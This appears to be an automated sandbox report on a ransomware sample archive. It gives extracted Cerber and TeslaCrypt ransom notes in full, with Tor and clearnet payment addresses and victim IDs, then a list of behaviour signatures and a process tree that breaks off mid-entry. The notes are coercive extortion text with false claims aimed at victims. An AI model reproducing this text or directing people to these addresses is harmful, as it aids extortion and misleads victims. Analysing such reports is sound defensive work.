CERBER RAN$OMWARE --- YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! --- The only way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_READ_THIS_FILE_*) with complete instructions how to decrypt your files. If you cannot find any (*_READ_THIS_FILE_*) file at your PC, follow the instructions below: --- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB Note! This page is available via "Tor Browser" only. --- Also you can use temporary addresses on your personal page without using "Tor Browser". --- 1. http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB 2. http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB 3. http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB 4. http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB 5. http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB --- Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://p27dokhpz2n7nvgr.onion/F26E-3268-3C90-0446-9BDB

http://p27dokhpz2n7nvgr.1hpvzl.top/F26E-3268-3C90-0446-9BDB

http://p27dokhpz2n7nvgr.1pglcs.top/F26E-3268-3C90-0446-9BDB

http://p27dokhpz2n7nvgr.1cewld.top/F26E-3268-3C90-0446-9BDB

http://p27dokhpz2n7nvgr.1js3tl.top/F26E-3268-3C90-0446-9BDB

http://p27dokhpz2n7nvgr.1ajohk.top/F26E-3268-3C90-0446-9BDB

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\_RECOVERY_+jejhg.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with AES More information about the encryption keys using AES can be found here: http://en.wikipedia.org/wiki/AES How did this happen ? !!! Specially for your PC was generated personal AES KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/2C51B9E8D8684675 2. http://tes543berda73i48fsdfsd.keratadze.at/2C51B9E8D8684675 3. http://tt54rfdjhb34rfbnknaerg.milerteddy.com/2C51B9E8D8684675 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/2C51B9E8D8684675 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/2C51B9E8D8684675 http://tes543berda73i48fsdfsd.keratadze.at/2C51B9E8D8684675 http://tt54rfdjhb34rfbnknaerg.milerteddy.com/2C51B9E8D8684675 *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/2C51B9E8D8684675
URLs

http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/2C51B9E8D8684675

http://tes543berda73i48fsdfsd.keratadze.at/2C51B9E8D8684675

http://tt54rfdjhb34rfbnknaerg.milerteddy.com/2C51B9E8D8684675

http://xlowfznrg4wf7dli.ONION/2C51B9E8D8684675

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\RECOVER+eihxu.TXT

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://akdfrefdkm45tf33fsdfsdf.yamenswash.com/2C51B9E8D8684675 2. http://p4fhmjnsdfbm4w4fdsc.avowvoice.com/2C51B9E8D8684675 3. http://nn54djhfnrnm4dnjnerfsd.replylaten.at/2C51B9E8D8684675 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/2C51B9E8D8684675 4. Follow the instructions on the site. !!! IMPORTANT INFORMATION: !!! Your personal pages: http://akdfrefdkm45tf33fsdfsdf.yamenswash.com/2C51B9E8D8684675 http://p4fhmjnsdfbm4w4fdsc.avowvoice.com/2C51B9E8D8684675 http://nn54djhfnrnm4dnjnerfsd.replylaten.at/2C51B9E8D8684675 !!! Your personal page Tor-Browser: fwgrhsao3aoml7ej.onion/2C51B9E8D8684675 !!! Your personal identification ID: 2C51B9E8D8684675
URLs

http://akdfrefdkm45tf33fsdfsdf.yamenswash.com/2C51B9E8D8684675

http://p4fhmjnsdfbm4w4fdsc.avowvoice.com/2C51B9E8D8684675

http://nn54djhfnrnm4dnjnerfsd.replylaten.at/2C51B9E8D8684675

http://fwgrhsao3aoml7ej.onion/2C51B9E8D8684675

Extracted

Path

C:\Users\Public\Recorded TV\Sample Media\# DECRYPT MY FILES #.txt

Family

cerber

Ransom Note
C E R B E R R A N S O M W A R E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable? It is normal because the files' names, as well as the data in your files have been encrypted. Great!!! You have turned to be a part of a big community #CerberRansomware. ######################################################################### !!! If you are reading this message it means the software !!! "Cerber Ransomware" has been removed from your computer. ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to get back your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4 | | 2. http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4 | | 3. http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4 | | 4. http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4 | | 5. http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://cerberhhyed5frqa.onion/E99A-5580-A36F-0063-7AE4 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4

http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4

http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4

http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4

http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4

http://cerberhhyed5frqa.onion/E99A-5580-A36F-0063-7AE4

Extracted

Path

C:\Users\Public\Recorded TV\Sample Media\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber Ransomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .tor { padding: 10px 0; text-align: center; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!!!<br>You have turned to be a part of a big community #CerberRansomware.</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber Ransomware" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">Any attempts to get back your files with the third-party tools can be fatal for your encrypted files.</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files.</p> <p>When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://cerberhhyed5frqa.onion/E99A-5580-A36F-0063-7AE4</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> </body> </html>

Signatures

  • Cerber

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Cerber family
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Gozi family
  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

  • Locky (Osiris variant)

    Variant of the Locky ransomware seen in the wild since early 2017.

  • Locky family
  • Locky_osiris family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

  • Teslacrypt family
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Wannacry family
  • Windows security bypass 2 TTPs 1 IoCs
  • Contacts a large (25451) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (104) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (713) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Drops startup file 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 6 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 39 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Interacts with shadow copies 3 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Opens file in notepad (likely ransom note) 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 45 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of UnmapMainImage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00291.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:956
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.MSIL.Crypren.gen-d10641bf82beae9ab02073e8e1c8b293bac836fb37b81b07e4725da010bebbb8.exe
      HEUR-Trojan-Ransom.MSIL.Crypren.gen-d10641bf82beae9ab02073e8e1c8b293bac836fb37b81b07e4725da010bebbb8.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      PID:2700
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Documents\save_your_files.html
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:3252
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3252 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3204
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3252 CREDAT:603147 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2988
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3252 CREDAT:1520656 /prefetch:2
          4⤵
            PID:7332
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3252 CREDAT:1455127 /prefetch:2
            4⤵
              PID:6496
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3252 CREDAT:3617826 /prefetch:2
              4⤵
                PID:4112
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3252 CREDAT:3224616 /prefetch:2
                4⤵
                  PID:3592
            • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Agent.gen-085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96.exe
              HEUR-Trojan-Ransom.Win32.Agent.gen-085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96.exe
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious behavior: MapViewOfSection
              PID:1444
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Agent.gen-085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96.exe
                HEUR-Trojan-Ransom.Win32.Agent.gen-085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2864
            • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Agent.gen-b5abdf8ed6c6c977d3a28d6e2763d71117c9135a9bb07a61b2f17dcc6f1ceff0.exe
              HEUR-Trojan-Ransom.Win32.Agent.gen-b5abdf8ed6c6c977d3a28d6e2763d71117c9135a9bb07a61b2f17dcc6f1ceff0.exe
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of WriteProcessMemory
              PID:2928
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 128
                3⤵
                • Loads dropped DLL
                • Program crash
                PID:756
            • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Agent.gen-ea76af7afb2f8219cbc1c470dafa757334a5df04eec25740b88968abe1365432.exe
              HEUR-Trojan-Ransom.Win32.Agent.gen-ea76af7afb2f8219cbc1c470dafa757334a5df04eec25740b88968abe1365432.exe
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious behavior: MapViewOfSection
              PID:1032
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Agent.gen-ea76af7afb2f8219cbc1c470dafa757334a5df04eec25740b88968abe1365432.exe
